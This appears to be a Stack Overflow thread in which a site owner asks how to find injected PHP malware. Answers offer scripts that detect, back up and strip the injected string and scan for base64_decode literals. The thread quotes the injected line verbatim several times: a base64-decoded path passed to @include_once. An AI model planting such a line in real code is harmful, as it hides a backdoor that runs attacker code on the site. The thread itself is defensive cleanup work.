1

Ok, I am pretty new to PHP, but I know it can read directories and files.

I have been struggling with a malware problem on one of our sites, and I need to write a script to search for it on my host space.

The code the hackers are putting in the files is:

*/ $DUOIEK = base64_decode("L2hvbWUvdXNlcnMvd2ViL2IxNjQzL3NsLnRoZWNoZXNzL3B1YmxpY19odG1sL01lZGNvdXJ0QmFja3Vwb2N0MjAwNy9NZWRjb3VydEJhY2t1cG9jdDIwMDctMi9iMmIgY3VzdG9tZXIvQnViYmxlcG9zdCBCYWNrIHVwL3B1YmxpY19odG1sL0JhY2t1cHMvTWVkaWFzdWZhY2UgMjAwNS9IZWxwIGFuZCBkb2N1bWVudGF0aW9uL2phdmEgYXBpL0phdmFBUEkvY29tL21lZGlhc3VyZmFjZS9kYXRhdHlwZXMvc2VhcmNoaW5nL2NsYXNzLXVzZS90c2Rlby5waHA="); @include_once $DUOIEK;/* */?>

I have no idea what this is but google blocks my site when this shows up.

I have to download all the files, then search them in Dreamweaver, replace this crap with a space and put them back.

I need a script to detect this before google does.

If anyone can give me some pointers it would be great.

I am sure this is a problem that everyone will face now or later.

AstroCB
  • 12,337
  • 20
  • 57
  • 73
mindmyweb
  • 888
  • 9
  • 13
  • In a separate file, echo base64_decode($DUOIEK) to see what they were trying to do – Ibu May 11 '11 at 08:40
  • [How To Use Search and Replace in Dreamweaver](http://webdesign.about.com/od/dreamweaverhowtos/ht/dw_find_replace.htm) – Gordon May 11 '11 at 08:42
  • One suggestion... Try to make sure that this never happens again. I have faced this malware also, and it was due to the FTP client (CuteFTP) which I was using. I had saved the password in it. Whenever I connected to the server it added this chunk of code to all index.php files. So change your password, and clean your system. – Muhammad Ummar May 11 '11 at 09:31
  • I've also experienced it, most likely because of the Filemanager in osCommerce. – Joshua - Pendo May 13 '11 at 07:40

3 Answers

1

Pure PHP solution that will find and replace the string you provided. Alternatively, you can just obtain the list of files that have been modified. Note: if you use this code, there is NO UNDO option; you're using it at your own risk.

<?php
$dir = '/your_dir/';
$searchstring = '*/ $DUOIEK = base64_decode("L2hvbWUvdXNlcnMvd2ViL2IxNjQzL3NsLnRoZWNoZXNzL3B1YmxpY19odG1sL01lZGNvdXJ0QmFja3Vwb2N0MjAwNy9NZWRjb3VydEJhY2t1cG9jdDIwMDctMi9iMmIgY3VzdG9tZXIvQnViYmxlcG9zdCBCYWNrIHVwL3B1YmxpY19odG1sL0JhY2t1cHMvTWVkaWFzdWZhY2UgMjAwNS9IZWxwIGFuZCBkb2N1bWVudGF0aW9uL2phdmEgYXBpL0phdmFBUEkvY29tL21lZGlhc3VyZmFjZS9kYXRhdHlwZXMvc2VhcmNoaW5nL2NsYXNzLXVzZS90c2Rlby5waHA="); @include_once $DUOIEK;/* */?>';
$infected = array(); // paths of files that contain the injected code

// SKIP_DOTS keeps "." and ".." out of the loop, so we never try to read a directory as a file
$iterator = new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS);

foreach (new RecursiveIteratorIterator($iterator) as $filename => $cur)
{
    if (!$cur->isFile()) {
        continue;
    }

    $contents = file_get_contents($filename);

    // Detection: check BEFORE replacing, otherwise the string is already gone when you look for it
    if (strpos($contents, $searchstring) !== false)
    {
        $infected[] = $filename; // gives you an array of paths to files that contain the injected code

        // Search and replace (drop these two lines if you only want the list)
        $contents = str_replace($searchstring, ' ', $contents);
        file_put_contents($filename, $contents);
    }
}

print_r($infected);

You can run the script either from the browser or the command line. I'm not saying this is the best option though.

Michael J.V.
  • 5,499
  • 1
  • 20
  • 16
  • 1
    Adding an undo function wouldn't be that hard ;-) Simply writing a filename.php.bck with the contents you got before replacing all. – Joshua - Pendo May 13 '11 at 07:39
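The same cleanup with the undo the comment above asks for, as an added example that is not part of the original answer: every file is backed up to `filename.bck` before it is rewritten, only files that actually contain the string are written, and a dry-run switch lets you see the list first. `$dir`, `$extensions` and `$dryRun` are placeholders you set yourself; the search string is the one posted in the question.

```php
<?php
// Added example (not the answer's own code): detect the injected string,
// keep a backup of every file before touching it, rewrite only files that change.
// Assumptions: $dir is your web root; $extensions limits the scan to text files
// the hackers are known to touch (so backups ending in .bck are never re-scanned).

$dir        = '/your_dir/';                        // placeholder
$extensions = array('php', 'phtml', 'html', 'htm', 'js');
$dryRun     = true;                                // set to false once the report looks right
$searchstring = '*/ $DUOIEK = base64_decode("L2hvbWUvdXNlcnMvd2ViL2IxNjQzL3NsLnRoZWNoZXNzL3B1YmxpY19odG1sL01lZGNvdXJ0QmFja3Vwb2N0MjAwNy9NZWRjb3VydEJhY2t1cG9jdDIwMDctMi9iMmIgY3VzdG9tZXIvQnViYmxlcG9zdCBCYWNrIHVwL3B1YmxpY19odG1sL0JhY2t1cHMvTWVkaWFzdWZhY2UgMjAwNS9IZWxwIGFuZCBkb2N1bWVudGF0aW9uL2phdmEgYXBpL0phdmFBUEkvY29tL21lZGlhc3VyZmFjZS9kYXRhdHlwZXMvc2VhcmNoaW5nL2NsYXNzLXVzZS90c2Rlby5waHA="); @include_once $DUOIEK;/* */?>';

// Returns a status string: 'clean', 'infected' (dry run), 'cleaned', or an error.
function cleanFile($path, $needle, $dryRun)
{
    $contents = file_get_contents($path);
    if ($contents === false || strpos($contents, $needle) === false) {
        return 'clean';
    }
    if ($dryRun) {
        return 'infected';
    }
    // Backup first so the change can be undone: file.php -> file.php.bck
    if (!copy($path, $path . '.bck')) {
        return 'backup failed, left untouched';
    }
    $cleaned = str_replace($needle, ' ', $contents);
    if (file_put_contents($path, $cleaned, LOCK_EX) === false) {
        return 'write failed';
    }
    return 'cleaned';
}

$iterator = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
);

$report = array();
foreach ($iterator as $path => $info) {
    if (!$info->isFile()) {
        continue;
    }
    $ext = strtolower($info->getExtension());
    if (!in_array($ext, $extensions, true)) {
        continue;                                  // also skips the .bck backups
    }
    $status = cleanFile($path, $searchstring, $dryRun);
    if ($status !== 'clean') {
        $report[$path] = $status;
        echo $status, ': ', $path, PHP_EOL;
    }
}
echo count($report), ' file(s) matched', PHP_EOL;
```

Run it from the command line with `$dryRun = true` first and keep the printed list: the set of infected files tells you which directories the attacker could write to, which is the thing to fix (the FTP password and file permissions) before the cleaned copies are put back, otherwise the code returns as the question describes.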
0

Download everything with your FTP client and run a find & replace over the complete directory (Dreamweaver supports complete directories). I've had this problem once as well; you might want to look for JavaScript hacks in your code as well, they tend to do JavaScript includes also.

The hack code tries to include this file:

/home/users/web/b1643/sl.thechess/public_html/MedcourtBackupoct2007/MedcourtBackupoct2007-2/b2b customer/Bubblepost Back up/public_html/Backups/Mediasuface 2005/Help and documentation/java api/JavaAPI/com/mediasurface/datatypes/searching/class-use/tsdeo.php

What is this? I don't know, but that's what it's trying to do. So you might consider this hack to have been done from inside the server you're hosted on, I think.

Joshua - Pendo
  • 4,331
  • 6
  • 37
  • 51
  • Yes, I decoded the base64 and found this: the file was opening a list of redirects, something like a spammed search page. I am deleting the whole MedcourtBackupoct file and then will try the script above. I have done the download-and-replace thing at least 3 times; it's a 5 GB host and I have to clean everything, and it comes back in a month. This file may be the cause of it. There were 2 more files in the folder. Thanks – mindmyweb May 13 '11 at 04:07
0

If you have SSH access you can use a command like this; just replace "eval(base64_decode" with "base64_decode".

If not, you will want to write a script that does a recursive loop through all of your files with readdir and then uses some strpos magic to detect "base64_decode".

And if you're really having problems I would recommend a 3rd-party service like Sucuri.

Good luck!

fire
  • 21,383
  • 17
  • 79
  • 114
  • Yes, this does get me on the right track. I tried to install a third-party service like site lock but that is ridiculous, they are asking 20 USD to clean 1 file. Only someone really stupid would pay that much. – mindmyweb May 13 '11 at 04:12
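The readdir-and-strpos scanner this answer describes, written out as an added example (not fire's code, and not from the original page). Instead of looking only for the one string from the question it flags any base64_decode() call with a string literal argument and decodes that literal, so you can see what each injected line was trying to include, which is also what the comments under the question suggest doing. It is read-only and never modifies a file. `$root` is a placeholder for your web root.

```php
<?php
// Added example: recursive readdir() walk + regex detection of base64_decode("literal").
// Read-only: reports findings, modifies nothing. Assumption: $root is your web root.

$root = '/your_dir/';                              // placeholder

// Recurse into every subdirectory; scan files with web-facing extensions.
// (Named walkTree rather than scandir: PHP function names are case-insensitive
//  and scandir() already exists.)
function walkTree($dir, array &$findings)
{
    $handle = opendir($dir);
    if ($handle === false) {
        return;
    }
    while (($entry = readdir($handle)) !== false) {
        if ($entry === '.' || $entry === '..') {
            continue;
        }
        $path = $dir . DIRECTORY_SEPARATOR . $entry;
        if (is_dir($path)) {
            walkTree($path, $findings);
        } elseif (preg_match('/\.(php|phtml|html?|js)$/i', $entry)) {
            scanFile($path, $findings);
        }
    }
    closedir($handle);
}

// Find base64_decode( "..." ) / base64_decode( '...' ) and decode the literal.
function scanFile($path, array &$findings)
{
    $src = file_get_contents($path);
    if ($src === false) {
        return;
    }
    $pattern = '/base64_decode\s*\(\s*([\'"])([A-Za-z0-9+\/=]+)\1\s*\)/';
    if (!preg_match_all($pattern, $src, $matches, PREG_SET_ORDER)) {
        return;
    }
    foreach ($matches as $hit) {
        $offset  = strpos($src, $hit[0]);
        $line    = substr_count(substr($src, 0, $offset), "\n") + 1;
        $decoded = base64_decode($hit[2], true);   // strict mode rejects junk
        $findings[] = array(
            'file'    => $path,
            'line'    => $line,
            'decoded' => $decoded === false ? '(not valid base64)' : $decoded,
        );
    }
}

$findings = array();
walkTree(rtrim($root, '/\\'), $findings);
foreach ($findings as $f) {
    printf("%s:%d decodes to: %s\n", $f['file'], $f['line'], $f['decoded']);
}
printf("%d suspicious base64_decode() call(s) found\n", count($findings));
```

Legitimate code can also pass a literal to base64_decode(), so treat the output as a list to review rather than a list to delete: the decoded value is the tell. An injected line in this incident decodes to a path on the same server (as the answer above shows), which is why checking the decoded string matters more than the presence of the function call.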